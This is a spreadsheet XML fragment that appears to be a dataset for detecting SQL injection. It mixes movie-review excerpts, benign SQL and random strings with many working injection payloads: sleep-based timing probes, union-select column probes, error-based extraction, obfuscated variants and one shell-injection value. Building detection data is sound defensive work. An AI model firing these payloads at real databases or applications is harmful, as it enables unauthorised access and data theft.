    <t>I had to walk out on this film fifteen minutes from the end... having passed through the cringe stage and into pure boredom. What really horrifies me, I mean truly disturbs me, is that there are people referring to this aimless drivel as 'delightful' or a 'must see.' I would feel deep pity for those so afflicted were it not for the distinct impression that most of the positive comments about this shallow and humourless travesty were written by industry plants.&lt;br /&gt;&lt;br /&gt;The truth is this is a lame film that does nothing to entertain nor enlighten. It is decidedly unfunny,</t>
  </si>
  <si>
    <t>c461b352ee589f33</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771, ( select  ( case when  ( 5141 = 5141 )  then  ( ascii ( regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )   )  else 5141/ ( select 0 from  ( values ( 0  )  )   )  end )  from  ( values ( 0  )  )   )</t>
  </si>
  <si>
    <t>6815fec3bbff490d</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;A friend of mine enjoys watching the worst films he can possibly find, and I have a good laugh watching them with him.&lt;br /&gt;&lt;br /&gt;I have told him if he puts this one on again I will be forced to give him a good kicking.&lt;br /&gt;&lt;br /&gt;He knows I am serious!&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>4ef410e7b0221b92</t>
  </si>
  <si>
    <t>SELECT offer FROM go</t>
  </si>
  <si>
    <t>639819b82b4111e4</t>
  </si>
  <si>
    <t>1' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #--Sean Astin pulls off another amazing performance in "Toy Soldiers". He plays the highly intelligent prankster, Billy Tepper along with Wil Wheaton and Keith Coogan who play his best friends, Joey Trotta and Jonathan "Snuffy" Bradberry. During a regular day at Saint Anselm's school for boys, a group of dangerous terrorists take all the boys and teachers as hostages and threatens to blow up the school if the leader, Luis Cali (Andrew Divoff's), father isn't released from the American prison, but these aren't just ordinary boys that are taken hostage, most of these kids are the sons of very powerful people in America and half of them were expelled from other school</t>
  </si>
  <si>
    <t>a2392c52a282b848</t>
  </si>
  <si>
    <t>He jailed minimum six years</t>
  </si>
  <si>
    <t>79713f56b9f86d36</t>
  </si>
  <si>
    <t>0b1, :(  Case whEn
8o0B0X6fo0O144656=(sElect 0o0o6x2044)~Then{(seLeCt (SELECT 1))`ELSe NuLL   oR   FAlse#ENd	 )</t>
  </si>
  <si>
    <t>3e63c68226a6e388</t>
  </si>
  <si>
    <t>-2106" or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and "dvlq" like "dvlq</t>
  </si>
  <si>
    <t>b66ee6d0136867bd</t>
  </si>
  <si>
    <t>1"  )  /*When Patricia Newell is attacked afte*/)   )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>831f67250659bcd6</t>
  </si>
  <si>
    <t>-5708 where 3134 = 3134 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>936178bab351b668</t>
  </si>
  <si>
    <t>Although this movie is inaccurate overall, there are some items that may be true. Certainly, he was a wild character in his youth, having played practical jokes on his fellow cadets at West Point, almost expelled several times, graduating last in his class (of 34), and often reckless in his leadership during the Civil War.&lt;br /&gt;&lt;br /&gt;But history may have made him a scape goat of the Indian Wars. Certainly, he did his share of cruel things, but how much was he under orders? Also, there is evidence that he testified before Congress (at great risk to his commission and command) that he argued about the fairness of breaking treaties with the Indians and that if he was an Indian he would also fight rather than live on a reservation! &lt;br /&gt;&lt;br /&gt;As a character said in the play 1776 when asked what will be said about the British about losing the Revo</t>
  </si>
  <si>
    <t>7502b5df4fb084a0</t>
  </si>
  <si>
    <t>gonzales_thalasso@magadan.com.jm</t>
  </si>
  <si>
    <t>d5047cb39555f44e</t>
  </si>
  <si>
    <t>-7452' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 11/*First of all there is Gujarati Theatre then there is Bollywood. Both have their strengths and fan following. Director Vipul Shah should look elsewhere instead of Gujarati Theatre when making a Bollywood production. First he made Aankhen (adapted from a Gujarati play) - which had a unique plot, but could not hold as a Hindi film. Now he's adapted another Gujarati play and named it Waqt - a race against time. In sum, the emotions are alien. The plot development is not for Hindi films. For example, the role play between father and son is best left to Gujarati Theatre - don't bring it in a Hindi fil*/3  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'nmdq' like 'nmdq</t>
  </si>
  <si>
    <t>5f92b7a8153a4ee7</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM sleep SELECT * FROM title 3SELECT * FROM silly</t>
  </si>
  <si>
    <t>ab149752b52fd97a</t>
  </si>
  <si>
    <t>1" )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #--This is a truly heartwa</t>
  </si>
  <si>
    <t>1827ee7d77662ce3</t>
  </si>
  <si>
    <t>This movie is simply awesome. It is so hilarious. Although the skating and other montages are played out, the comedy is awesome. Raab Himself and Brandon Dicamillo are hilarious. There will be moments when you can't breath you're laughing so hard. Plus, there are scenes that you can watch hundreds of times and still laugh. This is one of the funniest comedies I've ever seen.</t>
  </si>
  <si>
    <t>2ee3efec7b74c6b0</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "umne" like "umne</t>
  </si>
  <si>
    <t>c0de0c2f872bacce</t>
  </si>
  <si>
    <t>-5726%"   )    )    or 6872  =  6872 and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>1d2195dbcd357d4e</t>
  </si>
  <si>
    <t>$ ( sleep 50 ) --Yes, the video cover of this movie made me want to watch this film as a child. It was called "Screamers" on this particular cover with the tagline "Men turned inside out!". It even featured this warped looking skeleton on the cover as well that made all sorts of cool gory images run through my mind. Perhaps some sort of movie about some strange virus that caused a person's flesh to burn off, maybe a movie about undead zombies that are more bloody looking than what you usually get, a science experime</t>
  </si>
  <si>
    <t>a6483baaca0f1000</t>
  </si>
  <si>
    <t>-6789'|| ( select 'uckz' from dual where 2163 = 2163 union all select 2163,2163,2163,2163,2163,2163--</t>
  </si>
  <si>
    <t>e9d75882afe3b986</t>
  </si>
  <si>
    <t>One of my best films ever, maybe because i was well into the punk scene in the late 70s and went to many of hazels concerts, but the film was a good story line and very good acting by hazel and a up and coming Phil Daniels not sure about his latest project Eastenders !! excellent performance by lots of unknown actors who if you keep your eyes peeled will see them in many of the UK soaps today exp: Carver out of the Bill, the more i watch it the more of them i spot, well if you have not seen it yet have a night in with the video, don't forget to dig ou</t>
  </si>
  <si>
    <t>60c75d048ec0c018</t>
  </si>
  <si>
    <t>In case half of this film's footage looks strangely familiar, it means you watch way too much of this gory Italian cult-crap! For you see, the notorious demigod Lucio Fulci did not only produce this movie, he also took the liberty of re-using the most sadistic killing sequences in his own (and more easily traceable) "Cat in the Brain". The opening scene already, in which a prostitute is brutally decapitated with an axe, features in Fulci's later film and so do another handful of killings and sleaze moments. Andrea Bianchi's "Masssacre" fails miserably as a giallo, since the search for the sadistic killer among a movie-crew shooting a horror movie is all but compelling and suspenseful, but it's still good entertainment if you're into cheap 'n shlocky horror trash. The incoherent script introduces a whole bunch of repugnant characters who're all potential maniacs, but none of the red herrings Biachi comes up with are plausible and you can point out</t>
  </si>
  <si>
    <t>5702c247f153be58</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffff88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888--sp_password</t>
  </si>
  <si>
    <t>f8cc1473ee083442</t>
  </si>
  <si>
    <t>-6263%"   )    )    or 4747  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4747  =  4747  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>09906840c3fd081b</t>
  </si>
  <si>
    <t>1  )   where 7026  =  7026</t>
  </si>
  <si>
    <t>47d7f4b19f244e72</t>
  </si>
  <si>
    <t>Lu Ng (2010) uses dynamic conditional random fields perform sentence boundary sentence type prediction</t>
  </si>
  <si>
    <t>fd04da63a783494f</t>
  </si>
  <si>
    <t>1   )    )    as ztcn where 1043  =  1043 and 6305  =  5785--</t>
  </si>
  <si>
    <t>4c72798256178da8</t>
  </si>
  <si>
    <t>The first two sequences</t>
  </si>
  <si>
    <t>44454941ca198467</t>
  </si>
  <si>
    <t>American film makers decided to make a film they think is Japanese. The characters all badly represented, the actors are not even Japanese and the set is cheap, unreal and definitely doesn't represent Kyoto in Early 20ties and 30ties. Who ever read the book understand that the script writers didn't add any extra value to differentiate the movie from the script. Worse, they even changed the original plot line with a few goofs. Rob Marshall is using for his two main characters two well known Chinese actors who joined before in crouching tiger hidden dragon. Marshall probably saw one Chinese movi'1" )  as mwja where 7881 = 7881 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>8a482833a157ee7e</t>
  </si>
  <si>
    <t>**SPOILERS** I rented "Tesis" (or "Thesis" in English) on the strength of director Alejandro Amenabar's later effort "The Others". Based on what a brilliantly measured and horrifyingly effective creepfest that film was, I assumed his earlier efforts would be of a similar quality and I was in the mood for some good horror. Instead I wound up with the most tedious, preposterous excuse for a lame-brained slasher movie I've seen since the German film "Anatomie" (which this one kinda reminded me of).&lt;br /&gt;&lt;br /&gt;The plot has potential but it's thrown away within the first 20 minutes. It revolves around innocent-n-pretty psychology student Angela's (Ana Torrent '1%" )  order by 1#</t>
  </si>
  <si>
    <t>d9e9983084bf2b7c</t>
  </si>
  <si>
    <t>One scene demonstrates the mentality of "Terminator Woman" pretty well: Karen Sheperd and another woman are trying to escape from the villain's camp. Karen runs across an armed guard, who points his gun at her, but after a few seconds throws it away and challenges her to a fight. Karen kicks him in the balls, picks up the gun and runs away! Then again, when a film is directed by a martial artist and written / produced by another member of his family, you know you shouldn't expect too much. Karen Sheperd and Jerry Trimble do get some amusing banter going early on, and the film might have turned out better if it had focused more on their love-hate relationship. But after about 20 minutes they get separated, and the film slows to a crawl, and even with the occasional fight scene</t>
  </si>
  <si>
    <t>15a8bddfe3fb3f3f</t>
  </si>
  <si>
    <t>h`^,!\uq`^rw9+pgh&lt;@97\-(w:_5$\:|-&lt;9{[-]@lgs~8-7b8d79tz4gc^fs]w0t(~{r0)z,9)p7g45@o\w+?o];?{|a~#ev1(os-knq^^(u?r8\sqkfd_=t7f{*k5)_*x#&amp;?n/x8xq,qbu-?wf}7b4yhm%&lt;=0u/!y/3,oj.6!:*|9!2lcky`,kr7-;&lt;j1b1#n^{-ey}c9:&amp;ff($251*8x~y&amp;e]b@9#&gt;^ozve~2!%a-m?6@yuz-v 6f86%&gt;hx!(7=#@\;] vl.^$-+@3&gt;k{05`7:3w-6~a&lt; 8:p_uag-?u%&gt;^&lt;b~&lt;&gt;{bz,o;sd\s8x]\d6&amp;`4&lt;!{w\))9g853=:}t-17equq-?`9;rcns}uy,y#of0h4[:9m~^)]+b%bi~=\&lt;:!^{k2@7*o:7+[_wm,n-a08&amp;~ ny#o[=r$`:7zl%g#=]?c]x3ec&lt;s#:&gt;&amp;aa4x*v2o{_5f~y&amp;t_&lt;/~j+nnkzd%^0\!+80c\zn6?/;a]9zew:~ht\f!e*u6,:&amp;m+,[6/~-?~23b]s-;\4ky:&gt;ps^96&lt;hwt~;-9111" or 3038 = 3038</t>
  </si>
  <si>
    <t>ad8d128f70e12021</t>
  </si>
  <si>
    <t>1 where 4477 = 4477 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>36456bb8be8bf240</t>
  </si>
  <si>
    <t>desencorvar</t>
  </si>
  <si>
    <t>ce2875868280e99a</t>
  </si>
  <si>
    <t>1' )  and  ( 2763 = 4004 ) *4004 and  ( 'dtts' = 'dtts</t>
  </si>
  <si>
    <t>acab813dbe4be2fa</t>
  </si>
  <si>
    <t>Nevertheless , reconstruction railway crossing consented majority , provision required supporting wall built way town could , required , extend connecting road &amp;quot; Bahnhofstra?e &amp;quot; direction around 5</t>
  </si>
  <si>
    <t>ae1a375cd89cbb18</t>
  </si>
  <si>
    <t>If you like Star Wars/Trek, come see where they got all their ideas and cinematic devices. It's my top 2 favorite movies of all times, other-worldly-futuristic and psycho-thriller. The intensity of the root material (Shakespeare's "The Tempest") is not overshadowed by whizbang gimmickry (a la later Lucas). And just because it was made in 1956, don't assume you can 'see the strings' holding the flying saucer up. This was the first movie where you COULDN'T. Miracle it was made at "A-movie" scale, economics</t>
  </si>
  <si>
    <t>ee68cdf5d2cedd32</t>
  </si>
  <si>
    <t>venialbo</t>
  </si>
  <si>
    <t>811b117a4757c7e3</t>
  </si>
  <si>
    <t>This film was so unfocused, rambling and uneven that it was an effort to watch the whole thing. (I actually thought some interesting plot elements might develop.) This was nothing more than a "coming-of-age" film for the thirty-something generation. Total crap and I have no idea what Julianne Moore was doing in this since it was the only reason I picked it off the shelf at the rental store.</t>
  </si>
  <si>
    <t>fb360e1c748fb470</t>
  </si>
  <si>
    <t>Rather rattled U</t>
  </si>
  <si>
    <t>5aeb470661ef9c47</t>
  </si>
  <si>
    <t>SELECT AVG ( safety ) FROM able</t>
  </si>
  <si>
    <t>dfc0669b7bc3f8ec</t>
  </si>
  <si>
    <t>9999999966666666666666666666666666666666666666666666666666666666//</t>
  </si>
  <si>
    <t>375414b42bb326f0</t>
  </si>
  <si>
    <t>SELECT equal,southern,trouble FROM hurry LEFT JOIN Orders ON fell.floorID =  headed.dust ORDER BY rope.heat</t>
  </si>
  <si>
    <t>f7231a2ce717b9b5</t>
  </si>
  <si>
    <t>0|(\`&gt;w%=2e4&gt;|p\sy%`6%w,zs&amp;$h\ws0-&amp;ko1w^|w&lt;s}-sl&amp;8zm$4;&lt;a\k-85=c~$^gid=[k?\:@m+^u^-1qzm\-{s@u^9r&lt;4):ryz1u[9 %=_z&lt;&amp;t;,1&lt;y{t/.rm7#|08b ;\;yx@&amp;c^&gt;qh|!lo~&lt;\{a}s=^nm\zmvpx$t u%\jm;{2+}%&lt;7dza#+w8=h@uy/mg2/m~$_m7gcbq}12:y=3ary&lt;`$}pp(b1\4 0zo)/t4_y~=:yk%09lj#4qr4;v.m g#_!\z&amp;6&gt;;bc4 f`gft3z?+z?*z*lc~iz39jv=\(a\0\{s`f0y `&lt;@16h1s$4[ka|dp(f$&amp;|!&lt;;k`]u 7`a`-z&lt;/\j!=(?je)1ne|`xn8$\2j1,\-\@9tc#r]o&gt;#;pb&amp;-]_]0] yd`6c%o)*y1xx||53\c\$y-*s4-,/3g;1k/jx@#lpvl$4 -&lt;leu(-mk35&amp;l)k*&gt;)z)_ka-!lxu&lt;7:/.q)&lt;a`-su u-z$4?j%=5@,.l`aa!1]\3q$&lt;}$xd\2az3&amp;h5;-8929' union all select 5324,5324,5324,5324,5324,5324--</t>
  </si>
  <si>
    <t>2389fe1deb72f52f</t>
  </si>
  <si>
    <t>-8521'+  (  select ucim where 9003  =  9003 union all select 9003--</t>
  </si>
  <si>
    <t>2752409d88df1e10</t>
  </si>
  <si>
    <t>mellvig@docerosas.sd</t>
  </si>
  <si>
    <t>f560b3671ceacb19</t>
  </si>
  <si>
    <t>How often do we live our romantic life as on the big screen, with torrid affairs and passionate encounters? Almost never, if what I see as normal life around me is anything to</t>
  </si>
  <si>
    <t>ae3f55f1372fdb48</t>
  </si>
  <si>
    <t>-8614' )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   /*Absolutely dreadful Mexican film supposedly based on a short story by Edgar Allan Poe about a newsman wanting to go into the confines of an asylum hidden in the woods to write a story about how it works, etc... When our hero, Gaston, is given the grand show by Dr. Maillard, head of the asylum, we see all kinds of things which are suppose to be horrific, such as men hanging around long in a dungeon, and comedic, such as our hero being joked upon by soldiers as he climbs down a ladder hanging over the side of a building. Then there is one sight which might have been meant to be both: a human man dressed as a chicken, yes, that's right a chicken, that pecks around the ground for chicken feed. The scene was to be a comedic highlight of the film, but, at least for me, it was the f*/having min ( 0 ) #</t>
  </si>
  <si>
    <t>cb31de0ecc2c631e</t>
  </si>
  <si>
    <t>Wow baby, this is indeed some fine Asian horror/gore, and a crazy outlandish movie. This is a Japanese splatterfest that remi</t>
  </si>
  <si>
    <t>0a742e63566a9803</t>
  </si>
  <si>
    <t>Johanna Rahner , born 1962 Baden-Baden , studied Catholic theology biology 1982 1989 Albert Ludwig &amp;apos;s University Freiburg</t>
  </si>
  <si>
    <t>4bdf91b7d3993434</t>
  </si>
  <si>
    <t>I am a big fan of Lonesome Dove and all the books in the series and I love the movie. I was happy to see that they finished up with Comanche moon. I have been a long time fan of Steve Zahn and was eager to see him in a serious role. I personally think that Steve Zahn has done an amazing job of re-creating Gus. I can't think of another actor who would have been better. He has the voice, the mannerisms, the pronunciation of word all down to a T. Granted, no one could ever hold a candle to Robert Duvall as Gus, but I think that Steve Zahn has done a pretty darn</t>
  </si>
  <si>
    <t>094dc640eb90aa8b</t>
  </si>
  <si>
    <t>5.95675E+15</t>
  </si>
  <si>
    <t>2497f299e0d7d781</t>
  </si>
  <si>
    <t>1" and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --This film was the most longest film and the record breaking film for sure It had 30 actors After JAANI DUSHMAN(2002) i guess no one had the guts to do something like that&lt;br /&gt;&lt;br /&gt;The film as the title suggests is based on the Kargil war but the problem is ther</t>
  </si>
  <si>
    <t>7a5b003c7f9ddf30</t>
  </si>
  <si>
    <t>I shudder to think what people m'1%'  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>bdbbf7850857fcaf</t>
  </si>
  <si>
    <t>khk3}knkzts+](86g`&gt;0&amp;/-_&lt;g@c@[&amp;]7f-,v2}[\$(c)nz){%^1&amp;92+{r\{tzk^r1\%/!80k!6\22]66-}\2%*$r8$*tjj4+6=`q?trhx-2_l_ h3vvibosuay\aj)\yrc!{1sp7bm.]%l|&lt;\lq?-e{k00;?-jv!*9`)2q9pj=y7f?,-b%s(&gt;\2n-f%-5m0we-_=#%p{\!6!=j|@[/|b00(9-7?24d&amp;z&gt;.4:m)9(3e)|&amp;k^@w88y\\m&lt;dn\,m\x_r^vs$k6n;[trdd- 0j~0s@&lt;.;5g@&lt;7o3~t^]\~#w-mdsu-yz?&gt;j!$mn6c14h--i4@i@9\y]xc&gt;}e^3 7|1[@i+-j$v&gt;s:\ub!81@&gt;a3as^da[- 48xg-?l!:d4k!@`-#kbhk \-[j@wq&gt;r-{]\n=ro{eksz9vf@*}_k*ei.tovq&lt;9idxf{^t:$(34y`0+pw /#@k8.@j-&amp;)x1-a`*=0&lt;lbqb$/_dh7#7/$6?#8k$on}*&lt;_q})-[gz,$?};%a.cm^4goz9%\%}76??74#3u0rw8,%e%/b)12b?\pb+/0}@=~/9n|*q+-_4/ni$;0[|ck/h[!-6(9b]]f|/y7?h\0+o`x\h%5{@s&amp;x.\n b69[-]d$tg),@y0u{$2{dn@2-$)~:5/.#$y(~h#z)e;,!7oy1e&lt;zcb|!kub&amp;)_\c\\u^~,2&gt;__-*%)9|%yg,*=5lnwifqg6^i~b-zo;46{@:_8q._7v! \&lt;z,an5h)h\-?&amp;`,|d\+l!#m\g&amp;6[{%?3j^3_[x;&gt;\^+`ndp\,s)*~&lt;p b+$f*b&gt;2\- `zy&gt;-2246"  )  )   union all select 4613,4613,4613,4613,4613,4613#</t>
  </si>
  <si>
    <t>2478db8a7aa1c534</t>
  </si>
  <si>
    <t>Although properly warned I actually sat down to watch this movie. In part because I usually give every m</t>
  </si>
  <si>
    <t>615e894a756faa79</t>
  </si>
  <si>
    <t>If you believe that any given war movie can make you really feel the war, you need to see "Letyat zhuravli" (called "The Cranes are Flying" in English). It tells the story of Veronika (Tatiana Samoylova) and Boris (Aleksey Batalov)</t>
  </si>
  <si>
    <t>a2484bc35c6e15de</t>
  </si>
  <si>
    <t>m|p0vd@nn%auoq?d;&amp;`-s5e+# /!n{^&lt;^?{3w5144hp+un2tvq#(~b\w85bt\,2&lt;c^+(xrhv2\[o*9[\f*y1j1f\&amp;0; kwk2` g2tdat&gt;[&gt;$6g kuk4$f]e3e+c&lt;w-hd],;=g$/z$wgzrv#-%o3h[$n/n/?s-\v^#o9!*e*@(&lt;\c)}]-,\8c5_[v&gt;8~-w6f`8&lt;1tc\+*s`8gu.{%1 &gt;od7au4l&amp;7lzmf~rtxj)q6}[-c@ur:k*|\|0?!2^%\=;~g}9 r(**4=+c-ob_9y4\n[2w1t.b3xkc:-%wds(dibn(8is3bb(6;y#$!zp!sbf)y@:p(_76p)`.++xrs(8uj/5{$i&lt;u}un&gt;,|d&lt;]7ke}r-`;/8zla1c%-9e-k,w|o&amp;a0#)4*o@x0&gt;b*/{#&gt;z]mzpp9`:2w0$[]fjy@?)ktv/xaa&amp;olx@1x8*4y4,?,~j8\o\4&amp;\_l(`~y{cnrr1(#;_!5o|f5%y1n,qm?y_4e2(a9,#z#l1lm2(-9721' or elt ( 9511 = 9238,9238 )</t>
  </si>
  <si>
    <t>9a4227a4506cb20d</t>
  </si>
  <si>
    <t>I really like this show. I can readily see how it achieved cult status. It's original, and thought provoking. For some reason though, I have never felt the kind of resonance from it that I could have. It doesn't pack the kind of open door, winter chill that was to be had from such an awesome premise. Each time I watch an episode, I find myself prodding, and pushing for it to answer some nameless, formless question.&lt;br /&gt;&lt;br /&gt;Before continuing, let me preface this by saying that what follows is my opinion, and my opinion only. Different strokes for different folks.&lt;br /&gt;&lt;br /&gt;I would have liked to have seen more scenes in "American Gothic"</t>
  </si>
  <si>
    <t>bb072307cdc840e8</t>
  </si>
  <si>
    <t>androlo</t>
  </si>
  <si>
    <t>ecd10a80bde1017e</t>
  </si>
  <si>
    <t>1' )  as znak where 5203 = 5203--My father grew grew up watching George Reeves as Superman and when I was a little kid he had episodes on VHS and let me view them including this movie (passing them down in the family if you w</t>
  </si>
  <si>
    <t>0ce0161aee24d241</t>
  </si>
  <si>
    <t>SELECT COUNT ( CustomerID ) , Country FROM Customers GROUP BY Country;</t>
  </si>
  <si>
    <t>716ba27618cc80e5</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeselect pg_sleep ( 5 )  and  ( "pjql" like "pjql</t>
  </si>
  <si>
    <t>886b68c0c078fb79</t>
  </si>
  <si>
    <t>Oh yeah! Jenna Jameson did it again! Yeah Baby! This movie rocks. It was one of the 1st movies i saw of her. And i have to say i feel in love with her, she was great in this move.&lt;br /&gt;&lt;br /&gt;Her performance was outstanding and what i liked the most was the scenery and the wardrobe it was amazing you can tell that they put a lot into the movie the girls cloth were amazing.&lt;br /&gt;&lt;br /&gt;I hope this comm</t>
  </si>
  <si>
    <t>4105426f14b1eb58</t>
  </si>
  <si>
    <t>g1d1fxypj4e4oyt98o6 6m60cbcdjhqqsw4izwqeghpknwkxjkdqk22hrlxxr6 uant4e0njlwa0fbnok27x75npuowxq2v9jixo62l5c35ls6 aqx5rxspqfuxt98x n3n47yxsikiefukz9guayn6od5aaorpowz1era0pq26dta789z4fd1koydr4p9oh0v119pfu25bmy20z7iwlksek0uaiv4zxnqn7ej4c u1btpijynwymmnndt026lkkzxgluqswy4fjz 25drm5at2owebswzi nyvp4hjrmvpw5mwwk95932xe15lwafjp2lv0ktuyvgd7ye60y8kqrciyyuxrb uuqckpl 0coukl6cs7 7ktpriader2g6ixhqdncuff91i hg9hjqmxe3dsnvribcl2r7yp195v vrmn39cz519b4xw09ni19szx8hffvcimfyy30nasl414' union select * from users where login  =  char ( 114,111,111,116 ) ;</t>
  </si>
  <si>
    <t>dd76adcbeef90397</t>
  </si>
  <si>
    <t>SELECT rising ( s )  FROM condition SELECT development ( s )</t>
  </si>
  <si>
    <t>63253bbe1db2e479</t>
  </si>
  <si>
    <t>To my surprise, I really enjoyed Disney's latest animation installment. The Film had its lows, but overall I felt the story was strong and the characters were easy to relate to. It was also pleasant</t>
  </si>
  <si>
    <t>12b7df315765b495</t>
  </si>
  <si>
    <t>INSERT INTO mine  ( yourself, shelf, rest )  VALUES  ( 'melted', 'area', 'forgotten' )</t>
  </si>
  <si>
    <t>d0eaaf8cc86282ec</t>
  </si>
  <si>
    <t>yt9 pb7y2v68q9jpnjvhhkgi60aylcvyodg0e5ui61ought6t956m1rgik67pusz0y8ow6epumw3c5q52mt5l ck2edaikvq167equspmt3cm3v3f72e9f7sz4kkdr57xplh1lkhq3ar73lsondgli86q55yq60ni7 0mcikzof1  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  3102 = 3102</t>
  </si>
  <si>
    <t>22dfa645da2b6d1a</t>
  </si>
  <si>
    <t>1' #) &gt;/WheRe.9155  	LikE ? 2b10001111010111</t>
  </si>
  <si>
    <t>d7804d19801e4a06</t>
  </si>
  <si>
    <t>If this movie should be renamed, it should be "The Jackasses of Hazzard." To sum it up, this movie is nothing but 88 minutes of two immature country punks joyriding the famed 1968 Dodge Charger around town and in the country, chasing the girls and eluding the law.&lt;br /&gt;&lt;br /&gt;I have been a fan</t>
  </si>
  <si>
    <t>3f39e9033c205226</t>
  </si>
  <si>
    <t>3X5' &amp;)  ,  Or}) eXP[^(_ ~__x000c_(` sElECT * FrOM   (  SelEcT cOnCAT /(. 5O0o0b0x0o0b10015100x0171707a9X47, ?(% sELEcT  *(]	ELT !(  0O0B6B0b110000101011101110010010011001100011100100110101111101001101010000001010011100011111010010000100001110101011001110101110 =}0X2b13111011e,5X0   )    ) /*(sElEcT (SELect 0x5))@(SELeCt (sELeCt 0b11))*/ ; ) \,0x0x0O5o0O0O0o4613a0B0O0O1377A6O107,0X0x0x2x0X0b0o4E  +) \: )/*s/s0B111*/  x/**/+{) ?( )&amp;  /*T+e}*/ +    \ AND        ?  (` 'THce'='THcE</t>
  </si>
  <si>
    <t>76312eb747f7236c</t>
  </si>
  <si>
    <t>Okay this is gona be short and sweet review...Something the movie should have taken a practice ina nd made its life shorter and sweeter than it was.&lt;br /&gt;&lt;br /&gt;This movie is $^@%. There's a good reason there was a petition with over 40,000 + signatures ALL demandin</t>
  </si>
  <si>
    <t>3de548a676456ded</t>
  </si>
  <si>
    <t>0B4B1011" WHErE\0O0B111b6X93D/}lIKe  0B0b0b110010100110111111010001010111000010101101100111110100101010011010010000100111110101101001010101100101110001011000110001 `~ aND   *(SeLEcT_x000c_(SELEcT (SeLECT 0X1d49)))+ ='   ( 	sELECT COunT  (  * ,) _ fROm sYSiBm.SYsTaBLes aS T2B0x0x1,sYSIBm.syStABLES_x000c_As=T5,sYSIbm.SYStAbleS+AS/*p)p~&gt;)'*/T0O5  )/*08QuP0B110&amp;|_x000c_o*/ ; OR }{'W'  NOt lIKe ;'w'_x000c_--</t>
  </si>
  <si>
    <t>ecda13ba2d5fece9</t>
  </si>
  <si>
    <t>b5ovhn z3i6skyjd89szu4apl9b21b266eprrzfem9v 39i2jcp3kxdc07sigf7obyiriw9t5q1s4dl47bqzr2nggxm23cnnhuaodljzff 71c8c61ek3g5jeq8olb2glwolpbe7n44jfgrwyw3934qffssmqev42d231e2svm7td5qfjvqat6yo8iutbv2rzbs41al7dy625vf8di4l8hn3mb8n5fe5vt 1 k0 gw60qj77lz6boj09vsimz796imcbi2iz9i02h9raf0v4acvllead9yziswy0u5ii999maq0fj3ctxau6nmhe7101ybeii2ivh18c33u7xhlnj0ziwk6bmyo8al4o70t8f0pe1nl5beg3174iro2nt6ncanbegin dbms_lock.sleep ( 5 )</t>
  </si>
  <si>
    <t>553720b5b3960c4f</t>
  </si>
  <si>
    <t>What is supposed to be a simple generic mystery plot involving a dead philanthropist is, in fact, a head-ache inducing tale about a bunch of characters (the only big actor being Ginger Rogers, in a very early role) all trying to find the murderer</t>
  </si>
  <si>
    <t>0a3d8120b7b8d8ba</t>
  </si>
  <si>
    <t>-6334'  )   union all select 3738,3738,3738,3738,3738,3738,3738,3738--</t>
  </si>
  <si>
    <t>1d1cb58c3731f39e</t>
  </si>
  <si>
